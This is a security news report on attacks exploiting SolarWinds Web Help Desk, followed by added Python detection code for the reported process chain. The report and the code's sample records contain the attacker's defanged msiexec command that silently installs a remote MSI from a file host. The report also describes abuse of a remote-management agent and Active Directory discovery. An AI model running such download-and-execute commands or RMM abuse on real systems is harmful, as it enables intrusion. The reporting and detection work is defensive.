
"Security researchers warn of active attacks on SolarWinds Web Help Desk. Malicious actors are exploiting vulnerabilities to infiltrate systems and then deploy forensic tools as command-and-control infrastructure. The attack chain ends with preparing systems for ransomware deployment. Huntress researchers observed attacks originating from a compromised SolarWinds Web Help Desk instance last week. The attack chain started with wrapper.exe, the WHD service wrapper, which launched java.exe. The Java process then launched cmd.exe to silently install an external MSI payload via the command msiexec /q /i hxxps://files.catbox[.]moe/tmp9fc.msi."
"The attacker used Catbox to deploy a Zoho ManageEngine RMM agent. This legitimate remote management tool is often abused to gain access to compromised environments. The Zoho Assist agent was configured for unattended access, registering the compromised host with a Zoho Assist account linked to the Proton Mail address esmahyft@proton[.]me. Immediately after installing the RMM agent, the attacker began hands-on keyboard activity. Through the RMM agent process (TOOLSIQ.EXE), the attacker executed Active Directory discovery commands to inventory machines."
Active attacks targeted SolarWinds Web Help Desk, with compromise originating from a vulnerable WHD instance. The attack chain began when wrapper.exe launched java.exe, which spawned cmd.exe to silently install an external MSI via msiexec. The attackers deployed a Zoho ManageEngine RMM agent configured for unattended access and registered the host to a Proton Mail-linked Zoho Assist account. The intruders performed hands-on keyboard activity, executing Active Directory discovery through the RMM process. Velociraptor was then installed from an attacker-controlled Supabase bucket and used for remote command execution and process control. The campaign prepared systems for eventual ransomware deployment.
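The chain above is a good candidate for process-tree detection: a Web Help Desk service wrapper (wrapper.exe) spawning java.exe is normal, but java.exe spawning cmd.exe that runs msiexec against an http(s) package source is not. The following Python is an added example, not code from the Techzine or Huntress write-ups, and it runs two rules over constructed Sysmon Event ID 1-style records (pid, parent pid, image path, command line; the field names and the helper names `remote_msi_pids`, `whd_chain_pids` and `detect` are assumptions). One rule flags msiexec installing from a remote URL regardless of parent, the other flags any process descended through wrapper.exe -> java.exe -> cmd.exe; the msiexec URL in the sample records is the defanged one reported above.

```python
"""Detection logic for the WHD wrapper.exe -> java.exe -> cmd.exe -> msiexec chain.

Added example over constructed Sysmon Event ID 1-style process records.
Field names and rule names are assumptions, not a vendor's schema.
"""
import re
from dataclasses import dataclass
from typing import Dict, List, Sequence

# msiexec installing (/i or -i) a package fetched from an http(s) URL.
# Defanged hxxp(s) is accepted too so the rule can be exercised on IoC text.
REMOTE_MSI_RE = re.compile(
    r"(?i)msiexec(?:\.exe)?.*?\s[/-]i\s+[\"']?(?:https?|hxxps?)://"
)

# Parent -> child sequence reported for the compromised WHD instance.
WHD_CHAIN = ("wrapper.exe", "java.exe", "cmd.exe")


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str          # full image path as logged
    command_line: str


def basename(path: str) -> str:
    """Lower-case file name of a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def ancestry(by_pid: Dict[int, ProcEvent], pid: int) -> List[str]:
    """Image names from the oldest known ancestor down to pid."""
    chain, seen = [], set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)                      # guard against pid-reuse loops
        chain.append(basename(by_pid[pid].image))
        pid = by_pid[pid].ppid
    return list(reversed(chain))


def contains_chain(names: Sequence[str], chain: Sequence[str]) -> bool:
    """True if `chain` occurs as a contiguous run inside `names`."""
    k = len(chain)
    return any(tuple(names[i:i + k]) == tuple(chain)
               for i in range(len(names) - k + 1))


def remote_msi_pids(events: List[ProcEvent]) -> List[int]:
    """Processes whose command line runs msiexec against a remote package."""
    return [e.pid for e in events if REMOTE_MSI_RE.search(e.command_line)]


def whd_chain_pids(events: List[ProcEvent]) -> List[int]:
    """Processes descended through wrapper.exe -> java.exe -> cmd.exe."""
    by_pid = {e.pid: e for e in events}
    return [e.pid for e in events
            if contains_chain(ancestry(by_pid, e.pid), WHD_CHAIN)]


def detect(events: List[ProcEvent]) -> Dict[int, List[str]]:
    """Map pid -> names of the rules that fired; empty dict when none did."""
    hits: Dict[int, List[str]] = {}
    for pid in remote_msi_pids(events):
        hits.setdefault(pid, []).append("msiexec_remote_package")
    for pid in whd_chain_pids(events):
        hits.setdefault(pid, []).append("whd_wrapper_java_cmd_chain")
    return hits


def sample_events() -> List[ProcEvent]:
    """Constructed process records; only the msiexec URL comes from the report."""
    whd = r"C:\Program Files\WebHelpDesk"
    return [
        ProcEvent(400, 4, r"C:\Windows\System32\services.exe", "services.exe"),
        ProcEvent(1200, 400, whd + r"\bin\wrapper.exe", "wrapper.exe -s"),
        ProcEvent(1300, 1200, whd + r"\bin\jre\bin\java.exe", "java.exe -jar whd.jar"),
        ProcEvent(1400, 1300, r"C:\Windows\System32\cmd.exe",
                  "cmd.exe /c msiexec /q /i hxxps://files.catbox[.]moe/tmp9fc.msi"),
        ProcEvent(1500, 1400, r"C:\Windows\System32\msiexec.exe",
                  "msiexec /q /i hxxps://files.catbox[.]moe/tmp9fc.msi"),
        # benign: an administrator installing a local package from Explorer
        ProcEvent(2100, 900, r"C:\Windows\System32\msiexec.exe",
                  r"msiexec.exe /i C:\Users\admin\Downloads\agent.msi"),
    ]


if __name__ == "__main__":
    for pid, rules in detect(sample_events()).items():
        print(pid, ", ".join(rules))
```

Both rules fire on the cmd.exe and msiexec.exe records of the sample chain and stay quiet on the local install, which is the point of keeping them separate: the URL rule catches the same payload delivery under a different parent, while the ancestry rule catches a different payload delivered through the same WHD process tree.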
Read at Techzine Global